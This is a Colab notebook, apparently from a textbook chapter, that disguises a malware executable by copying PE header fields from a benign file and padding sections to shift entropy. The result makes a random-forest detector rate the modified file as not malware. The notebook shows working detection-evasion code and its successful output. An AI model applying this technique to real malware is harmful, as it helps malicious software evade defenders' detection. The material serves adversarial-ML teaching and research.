In [30]:
# 구글 드라이브 연결

from google.colab import drive
import shutil
import os

drive.mount('/content/drive')

project_path = '/content/drive/MyDrive/examples/3장/data'
os.makedirs(project_path, exist_ok=True)

# 현재 경로를 /content/drive로 설정
os.chdir(project_path)
print("현재 작업 디렉토리:", os.getcwd())
os.listdir(project_path)

Drive already mounted at /content/drive; to attempt to forcibly remount, call drive.mount("/content/drive", force_remount=True).
현재 작업 디렉토리: /content/drive/MyDrive/examples/3장/data


['malware.exe',
 'rf_model.joblib',
 'normal.exe',
 'model.joblib',
 'dog.png',
 'extract.py',
 '__pycache__',
 'malware_.exe',
 'modified_pe_text.exe']

In [31]:
!sudo apt-get update
!pip uninstall -y scikit-learn
!pip install joblib==1.4.2 numpy==1.25.2 pefile scikit-learn==1.5.1

Hit:1 https://cloud.r-project.org/bin/linux/ubuntu jammy-cran40/ InRelease
Hit:2 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu2204/x86_64  InRelease
Hit:3 http://security.ubuntu.com/ubuntu jammy-security InRelease
Hit:4 http://archive.ubuntu.com/ubuntu jammy InRelease
Hit:5 https://r2u.stat.illinois.edu/ubuntu jammy InRelease
Hit:6 http://archive.ubuntu.com/ubuntu jammy-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu jammy-backports InRelease
Hit:8 https://ppa.launchpadcontent.net/deadsnakes/ppa/ubuntu jammy InRelease
Hit:9 https://ppa.launchpadcontent.net/graphics-drivers/ppa/ubuntu jammy InRelease
Hit:10 https://ppa.launchpadcontent.net/ubuntugis/ppa/ubuntu jammy InRelease
Reading package lists... Done
W: Skipping acquire of configured file 'main/source/Sources' as repository 'https://r2u.stat.illinois.edu/ubuntu jammy InRelease' does not seem to provide it (sources.list entry misspelt?)
Found existing installation: scikit-learn 1.5.1
Uninstalling scikit-le

In [32]:
import csv, os, pefile
import math
import array
import random
import pandas as pd

import extract

class Adversarial():

    def __init__(self,benign,malware):

        header = ['e_cblp','e_cp','e_cparhdr','e_maxalloc','e_sp','e_lfanew',\
                  'NumofSections','CreationYear','FH3_local_sym','FH4_ws_trim','FH11_file_system','FH13_up_system',\
                  'Majorlinker','Minorlinker','SizeCode','InitialSize','UninitialSize','EntryPoint','BaseCode','BaseData',\
                  'MajorOS','MinorOS','MajorImage','MinorImage','MajorSub','MinorSub','Checksum','Subsystem',\
                  'SReserve','SCommit','HReserve','HCommit','LoaderFlags','DLL3','DLL4','DLL6'] #,'sus_sec','e_file','non_sus_sec','packer','e_text','e_data','filesize']

        self.benign_path = benign
        self.malware_path = malware
        self.total_list = pd.DataFrame(columns=header)

    def print_data(self, pe, clas):

        if clas == 1:
            msg = "Malware"
        else:
            msg = "Benign"

        dat = self.get_dos_data(pe) + self.get_file_data(pe) + self.get_optional_data(pe)

        # DataFrame에 새로운 행 추가 방법 수정
        self.total_list = pd.concat([self.total_list, pd.DataFrame([dat], columns=self.total_list.columns)], ignore_index=True)


    def get_dos_data(self, pe):

        dos_data = [pe.DOS_HEADER.e_cblp, pe.DOS_HEADER.e_cp, pe.DOS_HEADER.e_cparhdr, pe.DOS_HEADER.e_maxalloc, pe.DOS_HEADER.e_sp, pe.DOS_HEADER.e_lfanew]
        #self.total_list.append(dos_data)

        return dos_data

    def get_file_data(self, pe):

        seconds= pe.FILE_HEADER.TimeDateStamp
        creation_year = 1970 + ((int(seconds) / 86400) / 365)

        tmp = [pe.FILE_HEADER.IMAGE_FILE_RELOCS_STRIPPED,\
            pe.FILE_HEADER.IMAGE_FILE_EXECUTABLE_IMAGE,\
            pe.FILE_HEADER.IMAGE_FILE_LINE_NUMS_STRIPPED,\
            pe.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED,\
            pe.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM,\
            pe.FILE_HEADER.IMAGE_FILE_LARGE_ADDRESS_AWARE,\
            pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_LO,\
            pe.FILE_HEADER.IMAGE_FILE_32BIT_MACHINE,\
            pe.FILE_HEADER.IMAGE_FILE_DEBUG_STRIPPED,\
            pe.FILE_HEADER.IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP,\
            pe.FILE_HEADER.IMAGE_FILE_NET_RUN_FROM_SWAP,\
            pe.FILE_HEADER.IMAGE_FILE_SYSTEM,\
            pe.FILE_HEADER.IMAGE_FILE_DLL,\
            pe.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY,\
            pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_HI
            ]


        file_data = [pe.FILE_HEADER.NumberOfSections, creation_year, int(tmp[3]), int(tmp[4]), int(tmp[11]), int(tmp[13])]

        return file_data

    def get_optional_data(self, pe):

        tmp = [
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NX_COMPAT ,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_APPCONTAINER,\
            pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_GUARD_CF
            ]

        try:
            optional_data = [
                pe.OPTIONAL_HEADER.MajorLinkerVersion,\
                pe.OPTIONAL_HEADER.MinorLinkerVersion,\
                pe.OPTIONAL_HEADER.SizeOfCode,\
                pe.OPTIONAL_HEADER.SizeOfInitializedData,\
                pe.OPTIONAL_HEADER.SizeOfUninitializedData,\
                pe.OPTIONAL_HEADER.AddressOfEntryPoint,\
                pe.OPTIONAL_HEADER.BaseOfCode,\
                pe.OPTIONAL_HEADER.BaseOfData,\
                pe.OPTIONAL_HEADER.MajorOperatingSystemVersion,\
                pe.OPTIONAL_HEADER.MinorOperatingSystemVersion,\
                pe.OPTIONAL_HEADER.MajorImageVersion,\
                pe.OPTIONAL_HEADER.MinorImageVersion,\
                pe.OPTIONAL_HEADER.MajorSubsystemVersion,\
                pe.OPTIONAL_HEADER.MinorSubsystemVersion,\
                pe.OPTIONAL_HEADER.CheckSum,\
                pe.OPTIONAL_HEADER.Subsystem,
                pe.OPTIONAL_HEADER.SizeOfStackReserve,\
                pe.OPTIONAL_HEADER.SizeOfStackCommit,\
                pe.OPTIONAL_HEADER.SizeOfHeapReserve,\
                pe.OPTIONAL_HEADER.SizeOfHeapCommit,\
                int(pe.OPTIONAL_HEADER.LoaderFlags == 0),\
                int(tmp[3]), int(tmp[4]), int(tmp[6])]

        except Exception as e:
            print(e)

        return optional_data


    def write_dos_header(self, pe_b, pe_m):
        # total : 4
        pe_m.DOS_HEADER.e_cblp = pe_b.DOS_HEADER.e_cblp
        pe_m.DOS_HEADER.e_cparhdr = pe_b.DOS_HEADER.e_cparhdr
        pe_m.DOS_HEADER.e_maxalloc = pe_b.DOS_HEADER.e_maxalloc
        pe_m.DOS_HEADER.e_sp = pe_b.DOS_HEADER.e_sp

    def write_file_header(self, pe_b, pe_m):
        # total : 5
        pe_m.FILE_HEADER.TimeDateStamp = pe_b.FILE_HEADER.TimeDateStamp
        pe_m.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED = pe_b.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED
        pe_m.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM =  pe_b.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM
        pe_m.FILE_HEADER.IMAGE_FILE_SYSTEM = pe_b.FILE_HEADER.IMAGE_FILE_SYSTEM
        pe_m.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY = pe_b.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY


    def write_optional_header(self, pe_b, pe_m):
        # total : 24
        pe_m.OPTIONAL_HEADER.MajorLinkerVersion = pe_b.OPTIONAL_HEADER.MajorLinkerVersion
        pe_m.OPTIONAL_HEADER.MinorLinkerVersion = pe_b.OPTIONAL_HEADER.MinorLinkerVersion
        pe_m.OPTIONAL_HEADER.SizeOfCode = pe_b.OPTIONAL_HEADER.SizeOfCode
        pe_m.OPTIONAL_HEADER.SizeOfInitializedData = pe_b.OPTIONAL_HEADER.SizeOfInitializedData
        pe_m.OPTIONAL_HEADER.SizeOfUninitializedData = pe_b.OPTIONAL_HEADER.SizeOfUninitializedData
        pe_m.OPTIONAL_HEADER.BaseOfCode = pe_b.OPTIONAL_HEADER.BaseOfCode
        pe_m.OPTIONAL_HEADER.BaseOfData = pe_b.OPTIONAL_HEADER.BaseOfData
        pe_m.OPTIONAL_HEADER.MajorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MajorOperatingSystemVersion
        pe_m.OPTIONAL_HEADER.MinorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MinorOperatingSystemVersion
        pe_m.OPTIONAL_HEADER.MajorImageVersion = pe_b.OPTIONAL_HEADER.MajorImageVersion
        pe_m.OPTIONAL_HEADER.MinorImageVersion = pe_b.OPTIONAL_HEADER.MinorImageVersion
        pe_m.OPTIONAL_HEADER.MajorSubsystemVersion = pe_b.OPTIONAL_HEADER.MajorSubsystemVersion
        pe_m.OPTIONAL_HEADER.MinorSubsystemVersion = pe_b.OPTIONAL_HEADER.MinorSubsystemVersion
        pe_m.OPTIONAL_HEADER.CheckSum = pe_b.OPTIONAL_HEADER.CheckSum
        pe_m.OPTIONAL_HEADER.Subsystem = pe_b.OPTIONAL_HEADER.Subsystem
        pe_m.OPTIONAL_HEADER.SizeOfStackReserve = pe_b.OPTIONAL_HEADER.SizeOfStackReserve
        pe_m.OPTIONAL_HEADER.SizeOfStackCommit = pe_b.OPTIONAL_HEADER.SizeOfStackCommit
        pe_m.OPTIONAL_HEADER.SizeOfHeapReserve = pe_b.OPTIONAL_HEADER.SizeOfHeapReserve
        pe_m.OPTIONAL_HEADER.SizeOfHeapCommit = pe_b.OPTIONAL_HEADER.SizeOfHeapCommit
        pe_m.OPTIONAL_HEADER.LoaderFlags = pe_b.OPTIONAL_HEADER.LoaderFlags
        pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION
        pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH
        pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND =  pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND
        pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER


    def write_extra_info(self, pe_b, pe_m):
        # total : 2
        benign_sections = ['.text', '.rdata','.data','.idata','.edata','.rsrc','.bss','.crt','.tls']

        NumSection = pe_m.FILE_HEADER.NumberOfSections
        for i in range(0, NumSection):
            pe_m.sections[i].Name = benign_sections[i].encode()


    def get_start(self, mode):

        # get benign pe file with pefile
        try:
            pe_benign = pefile.PE(self.benign_path)
        except Exception as e:
            print("{} while opening {}".format(e,self.benign_path))

        # get malware pe file with pefile
        try:
            pe_malware = pefile.PE(self.malware_path)
        except Exception as e:
            print("{} while opening {}".format(e,self.malware_path))

        self.print_data(pe_benign, 0)
        self.print_data(pe_malware, 1)

        if mode == 1:
            self.write_dos_header(pe_benign, pe_malware)
            self.write_file_header(pe_benign, pe_malware)
            self.write_optional_header(pe_benign, pe_malware)
            self.write_extra_info(pe_benign, pe_malware)

            new_exe_path = "malware_.exe"
            pe_malware.write(new_exe_path)
            new_pe = pefile.PE(new_exe_path)

        return self.total_list

In [33]:
def cal_byteFrequency(byteArr, fileSize):
    freqList = []
    for b in range(256):
        ctr = 0
        for byte in byteArr:
            if byte == b:
                ctr += 1
        freqList.append(float(ctr) / fileSize)
    return freqList

def get_file_entropy(byteArr, fileSize):
    freqList = cal_byteFrequency(byteArr, fileSize)
    ent = 0.0
    for freq in freqList:
        if freq > 0:
            ent += -freq * math.log(freq, 2)
    return [fileSize, ent]

def get_text_data_entropy(pe):
    result = [0.0, 0.0]
    for section in pe.sections:
        s_name = section.Name.split(b'\x00')[0]
        if s_name == b".text":
            result[0] = section.get_entropy()
        elif s_name == b".data":
            result[1] = section.get_entropy()
    return result

def get_file_bytes_size(filepath):
    with open(filepath, 'rb') as f:  # Open the file in binary mode
        byteArr = list(f.read())  # Read the file content as bytes and convert to a list
    fileSize = len(byteArr)
    return byteArr, fileSize

In [34]:
def write_text_entropy(ben, mal, loo):
    ben_pe = pefile.PE(ben)
    mal_pe = pefile.PE(mal)

    ben_en = get_text_data_entropy(ben_pe)
    mal_en = get_text_data_entropy(mal_pe)

    insert_mul = loo
    text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment * insert_mul

    start = None
    for section in mal_pe.sections:
        s_name = section.Name.split(b'\x00')[0]
        if s_name == b".text":
            start = section.PointerToRawData + section.SizeOfRawData
            section.SizeOfRawData += text_padding
            end = section.PointerToRawData + section.SizeOfRawData
        else:
            section.PointerToRawData += text_padding

    mal_pe.write('modified_pe_text.exe')
    mal_pe.__data__.close()

    if start is None:
        raise ValueError(".text section not found in the PE file")

    bytearr, _ = get_file_bytes_size('modified_pe_text.exe')

    if ben_en[0] > mal_en[0]:
        bytearr[start:start + text_padding] = [random.sample(range(255), 1)[0] for _ in range(text_padding)]
    else:
        bytearr[start:start + text_padding] = [0 for _ in range(text_padding)]

    byte = array.array('B', bytearr).tobytes()
    with open('modified_pe_text.exe', 'wb') as f:
        f.write(byte)

    new_pe = pefile.PE('modified_pe_text.exe')
    new_en = get_text_data_entropy(new_pe)

    diff = abs(new_en[0] - ben_en[0])
    print("* text section entropy :", mal_en[0], "->", new_en[0], " diff: ", diff)

    return diff, new_en[0]

In [35]:
def write_data_entropy(ben, mal, loo):
    ben_pe = pefile.PE(ben)
    mal_pe = pefile.PE(mal)

    ben_en = get_text_data_entropy(ben_pe)
    mal_en = get_text_data_entropy(mal_pe)

    insert_mul = loo
    text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment * insert_mul

    start = None
    for section in mal_pe.sections:
        s_name = section.Name.split(b'\x00')[0]
        if s_name == b".data":
            start = section.PointerToRawData + section.SizeOfRawData
            section.SizeOfRawData += text_padding
            end = section.PointerToRawData + section.SizeOfRawData
        elif s_name not in [b".text", b".data"]:
            section.PointerToRawData += text_padding

    mal_pe.write('modified_pe_data.exe')
    mal_pe.__data__.close()

    if start is None:
        raise ValueError(".data section not found in the PE file")

    bytearr, _ = get_file_bytes_size('modified_pe_data.exe')

    if ben_en[1] > mal_en[1]:
        bytearr[start:start + text_padding] = [random.sample(range(255), 1)[0] for _ in range(text_padding)]
    else:
        bytearr[start:start + text_padding] = [0 for _ in range(text_padding)]

    byte = array.array('B', bytearr).tobytes()
    with open('modified_pe_data.exe', 'wb') as f:
        f.write(byte)

    new_pe = pefile.PE('modified_pe_data.exe')
    new_en = get_text_data_entropy(new_pe)

    diff = abs(new_en[1] - ben_en[1])
    print("* data section entropy :", mal_en[1], "->", new_en[1], " diff: ", diff)

    return diff, new_en[1]


In [36]:
def write_file_entropy(ben, mal):
    bytearr_ben, size_ben = get_file_bytes_size(ben)
    bytearr_mal, size_mal = get_file_bytes_size(mal)

    ben_en = get_file_entropy(bytearr_ben, size_ben)[1]
    mal_en = get_file_entropy(bytearr_mal, size_mal)[1]

    print("File entropy before: ", ben_en, " ", mal_en, " diff_bak: ", abs(ben_en - mal_en))

    append_size = abs(size_ben - size_mal)

    if ben_en < mal_en:
        appen = [0 for _ in range(append_size)]
        bytearr_ben.extend(appen)
    else:
        appen = [0 for _ in range(append_size)]
        bytearr_mal.extend(appen)

    if len(bytearr_ben) > len(bytearr_mal):
        bytearr_mal.extend([0] * (len(bytearr_ben) - len(bytearr_mal)))
    else:
        bytearr_ben.extend([0] * (len(bytearr_mal) - len(bytearr_ben)))

    byte = array.array('B', bytearr_mal).tobytes()
    with open('malware_new.exe', 'wb') as f:
        f.write(byte)

    new_pe = pefile.PE('malware_new.exe')
    new_en = get_file_entropy(bytearr_mal, len(bytearr_mal))

    print("File entropy after: ", ben_en, " -> ", new_en[1])

    return new_en[1]

In [37]:
ben = 'normal.exe'
mal = 'malware.exe'

pe = Adversarial(ben, mal)
pd = pe.get_start(1)

print("[*] Before Crafting Malware Sample ")
pd.head()

[*] Before Crafting Malware Sample 


<ipython-input-32-a064c9238eb6>:33: FutureWarning: The behavior of DataFrame concatenation with empty or all-NA entries is deprecated. In a future version, this will no longer exclude empty or all-NA columns when determining the result dtypes. To retain the old behavior, exclude the relevant entries before the concat operation.
  self.total_list = pd.concat([self.total_list, pd.DataFrame([dat], columns=self.total_list.columns)], ignore_index=True)


,e_cblp,e_cp,e_cparhdr,e_maxalloc,e_sp,e_lfanew,NumofSections,CreationYear,FH3_local_sym,FH4_ws_trim,...,Checksum,Subsystem,SReserve,SCommit,HReserve,HCommit,LoaderFlags,DLL3,DLL4,DLL6
0,144,3,4,65535,184,280,5,2024.137179,0,0,...,1702462,2,1048576,4096,1048576,4096,1,0,0,0
1,144,3,4,65535,184,216,5,2009.956035,1,0,...,0,2,1048576,4096,1048576,4096,1,0,0,0


In [38]:
mal = 'malware.exe'
after_t = 'modified_pe_text.exe'
after_d = 'modified_pe_data.exe'

count = 0
diff_bak = 10

for i in range(1, 10):
    diff, e = write_text_entropy(ben, mal, i)
    if diff_bak > diff:
        diff_bak = diff
    else:
        count = i-1
        break

diff, e = write_text_entropy(ben, mal, count)
print("* Final Text Section Entropy : ", e)

count = 0
diff_bak = 10

for i in range(1, 30):
    diff, f = write_data_entropy(ben, after_t, i)
    if diff_bak > diff:
        diff_bak = diff
    else:
        count = i-1
        diff, f = write_data_entropy(ben, after_t, count)
        break

diff, e = write_data_entropy(ben, mal, count)
print("* Final Data Section Entropy : ", f)

ent = write_file_entropy(ben, after_d)
print("* Final File Entropy : ", ent)


* text section entropy : 6.452378445431005 -> 6.514632519569931  diff:  0.04492232898397486
* text section entropy : 6.452378445431005 -> 6.5710760817380764  diff:  0.011521233184170754
* text section entropy : 6.452378445431005 -> 6.621850749081476  diff:  0.0622959005275705
* text section entropy : 6.452378445431005 -> 6.57009305911395  diff:  0.010538210560044448
* Final Text Section Entropy :  6.57009305911395
* data section entropy : 2.1421324210656874 -> 4.690586317510537  diff:  0.16628343775863463
* data section entropy : 2.1421324210656874 -> 5.756102774469971  diff:  0.8992330192007998
* data section entropy : 2.1421324210656874 -> 4.660941361617983  diff:  0.19592839365118841
* data section entropy : 4.610414467760687 -> 6.257393623654032  diff:  1.4005238683848606
* Final Data Section Entropy :  4.660941361617983
File entropy before:  6.461401089461746   7.91242357847465  diff_bak:  1.451022489012904
File entropy after:  6.461401089461746  ->  1.8492872302836962
* Final Fil

In [39]:
import numpy as np
import joblib
from sklearn.ensemble import RandomForestClassifier
import extract
import warnings

def check_file(filepath):

  isValid = True

  # Extract features from the PE file
  ft = extract.PE_features(filepath)
  data, magic = ft.extract_all()

  # Check if the file is 64-bit and cannot be processed
  if magic != 267:
      print("64-bit File. Cannot process")
      isValid = False

  if len(data) != 67:
      print("File corrupted")
      isValid = False

  if (isValid):
      # Convert data to a numpy array and reshape it for prediction
      data = np.asarray(data).reshape((1, -1))
      print("Data shape:", data.shape)

      # Load the pre-trained model
      clf = joblib.load('rf_model.joblib')

      # Predict the probability of the file being malware
      rns = clf.predict_proba(data)[0][1] * 100  # Assuming you want the percentage

      # Check the result and print the appropriate message
      if rns > 90:
          print(f"{filepath} is malware! - {rns:.2f}%")
      else:
          print(f"{filepath} is not malware! - {rns:.2f}%")

In [40]:
check_file('malware_new.exe')

Data shape: (1, 67)
malware_new.exe is not malware! - 82.00%


/usr/local/lib/python3.11/dist-packages/sklearn/base.py:493: UserWarning: X does not have valid feature names, but RandomForestClassifier was fitted with feature names
  warnings.warn(
